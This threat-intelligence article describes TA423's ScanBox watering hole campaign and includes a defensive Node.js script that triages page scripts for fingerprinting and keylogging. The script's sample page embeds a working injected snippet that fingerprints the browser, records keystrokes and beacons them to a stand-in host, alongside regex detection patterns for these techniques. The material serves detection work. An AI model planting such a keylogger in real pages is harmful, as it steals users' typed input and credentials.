The Rise of ScanBox Keylogger: Watering Hole Attacks on the Horizon

Advanced Persistent Threat Group TA423 Uses Watering Hole Attacks to Plant ScanBox Keylogger

The Threat

China-based advanced persistent threat group TA423, also known as Red Ladon, has been identified as the perpetrator of a watering hole attack using the ScanBox JavaScript-based reconnaissance framework. The group targeted domestic Australian organizations and offshore energy firms in the South China Sea, using messages that purportedly linked back to Australian news websites to carry out cyber espionage campaigns between April and June 2022.

The Tool

ScanBox is a highly customizable, multifunctional JavaScript framework that threat actors use for covert reconnaissance. It has been in use for almost ten years, and its most noteworthy feature is its keylogging functionality. Attackers can use it to profile targets without planting malware on a target's system: they rely on a watering hole attack to load the malicious JavaScript from a compromised or attacker-controlled website. Once loaded in the browser, ScanBox acts as a keylogger, capturing everything an affected user types on the watering hole page.

The Attack

TA423’s attacks began with phishing emails with subject lines such as “Sick Leave,” “User Research,” and “Request Cooperation,” purportedly from an employee of a fictional organization called the “Australian Morning News.” The link in the email directed recipients to australianmorningnews[.]com, a site whose content was copied from real news outlets such as the BBC and Sky News; visiting it served the ScanBox framework.

The keylogger data gathered at the watering hole is one stage of a multi-stage attack: it gives the attackers insight into potential targets that helps them plan follow-on attacks. The initial script collects information about the target computer, including the operating system, language, and the version of Adobe Flash installed. ScanBox also checks for browser extensions, plugins, and components such as WebRTC.

Why Is It Dangerous?

ScanBox is particularly dangerous because it does not require malware to be written to disk to steal information. The JavaScript code only needs to be executed by a web browser for the keylogging functionality to work, so adversaries can conduct reconnaissance while avoiding file-based endpoint detection.
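Because the framework lives only in the page's JavaScript, a practical first check for a suspected watering hole is to triage the page's scripts for the two behaviours described above: browser fingerprinting (navigator properties, plugins, WebRTC) and keystroke capture paired with a network send. The following Node.js script is an added example written for this article, not ScanBox code or anything from Proofpoint's research; the sample page, the host names (example-news.test, tracker-injected.test) and the script bodies in it are constructed for illustration and are not real indicators.

```javascript
"use strict";
// Added example: static triage of a page's <script> blocks for
// fingerprinting and keylog-plus-exfiltration behaviour.

const SCRIPT_RE = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
const SRC_RE = /\bsrc\s*=\s*["']([^"']+)["']/i;

// Indicator groups. Each pattern counts at most once per script, so the
// counts below say "how many distinct surfaces" a script touches.
const INDICATORS = {
  keylog: [
    /addEventListener\s*\(\s*["'](?:keydown|keypress|keyup|input)["']/,
    /\.on(?:keydown|keypress|keyup)\s*=/,
  ],
  exfil: [
    /\bXMLHttpRequest\b/,
    /\bfetch\s*\(/,
    /\bnavigator\.sendBeacon\b/,
    /new\s+Image\s*\(\)[\s\S]{0,80}\.src\s*=/, // image-beacon exfil
  ],
  fingerprint: [
    /navigator\.(?:userAgent|platform|language|plugins|mimeTypes)/,
    /\bRTCPeerConnection\b/, // WebRTC probing
    /ShockwaveFlash|ActiveXObject/, // Flash / legacy plugin checks
    /screen\.(?:width|height|colorDepth)/,
  ],
};

// Pull every <script> out of raw HTML, keeping either its src or its body.
function extractScripts(html) {
  const scripts = [];
  let m;
  while ((m = SCRIPT_RE.exec(html)) !== null) {
    const src = SRC_RE.exec(m[1]);
    scripts.push({ src: src ? src[1] : null, body: m[2] });
  }
  return scripts;
}

// Count how many patterns of each indicator group match an inline body.
function assessBody(body) {
  const hits = {};
  for (const [group, patterns] of Object.entries(INDICATORS)) {
    hits[group] = patterns.filter((re) => re.test(body)).length;
  }
  return hits;
}

// Return findings: external scripts from hosts outside the allowlist, inline
// scripts that both capture keys and send data, and inline scripts that
// probe two or more fingerprinting surfaces.
function triagePage(html, pageOrigin, allowedHosts) {
  const findings = [];
  extractScripts(html).forEach((s, index) => {
    if (s.src) {
      const host = new URL(s.src, pageOrigin).hostname;
      if (!allowedHosts.includes(host)) {
        findings.push({ index, kind: "third-party-src", detail: host });
      }
      return;
    }
    const hits = assessBody(s.body);
    if (hits.keylog > 0 && hits.exfil > 0) {
      findings.push({ index, kind: "keylog-and-exfil", detail: hits });
    } else if (hits.fingerprint >= 2) {
      findings.push({ index, kind: "fingerprinting", detail: hits });
    }
  });
  return findings;
}

// Constructed sample page: two legitimate scripts, one injected third-party
// script tag, a benign inline handler, and an injected recon + keylogger.
const PAGE_ORIGIN = "https://www.example-news.test/";
const ALLOWED_HOSTS = ["www.example-news.test", "cdn.example-news.test"];
const SAMPLE_PAGE = `<!doctype html><html><head><title>News</title>
<script src="/static/site.js"></script>
<script src="//cdn.example-news.test/lib.js"></script>
<script src="https://tracker-injected.test/s.js"></script>
<script>
  // benign: submit the search box on Enter, no network send
  document.getElementById("q").addEventListener("keydown", function (e) {
    if (e.key === "Enter") document.forms[0].submit();
  });
</script>
<script>
  // constructed injected script: fingerprint, log keys, beacon them out
  var info = [navigator.userAgent, navigator.language, navigator.plugins.length,
              screen.width + "x" + screen.height];
  try { new RTCPeerConnection({}).createDataChannel(""); } catch (e) {}
  var buf = "";
  document.addEventListener("keydown", function (e) { buf += e.key; });
  setInterval(function () {
    var img = new Image();
    img.src = "https://tracker-injected.test/k?d=" + encodeURIComponent(buf + "|" + info.join(","));
    buf = "";
  }, 5000);
</script>
</head><body><input id="q"></body></html>`;

if (typeof require !== "undefined" && require.main === module) {
  console.log(JSON.stringify(triagePage(SAMPLE_PAGE, PAGE_ORIGIN, ALLOWED_HOSTS), null, 2));
}
```

Run against the sample page, the triage flags the unknown external host and the inline script that combines a keydown listener with an image beacon, while the benign Enter-key handler is left alone. Pattern matching like this is a triage aid for responders looking at a captured page, not a control: preventing the injection in the first place is a job for a strict Content-Security-Policy script-src allowlist and integrity checks on the scripts a site legitimately loads.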

The Targets

According to Proofpoint’s Threat Research Team and PwC’s Threat Intelligence team, the group supports the Chinese government’s interests in matters related to the South China Sea. In particular, it has focused on naval issues, with Malaysia, Singapore, Taiwan, and Australia as obvious targets of interest. Building on prior successes, TA423 has expanded its targeting globally.

Recommendations

To avoid being a victim of ScanBox attacks, organizations and individuals should stay alert and follow basic cybersecurity best practices, such as not clicking links in unsolicited emails from unfamiliar senders. Organizations should also enforce multi-factor authentication, keep software up to date with the latest security patches, and continuously monitor their networks for suspicious activity. Because ScanBox runs entirely in the browser and writes nothing to disk, web proxy logging, blocking of known attacker domains such as australianmorningnews[.]com, and browser telemetry matter more here than file-based endpoint scanning.
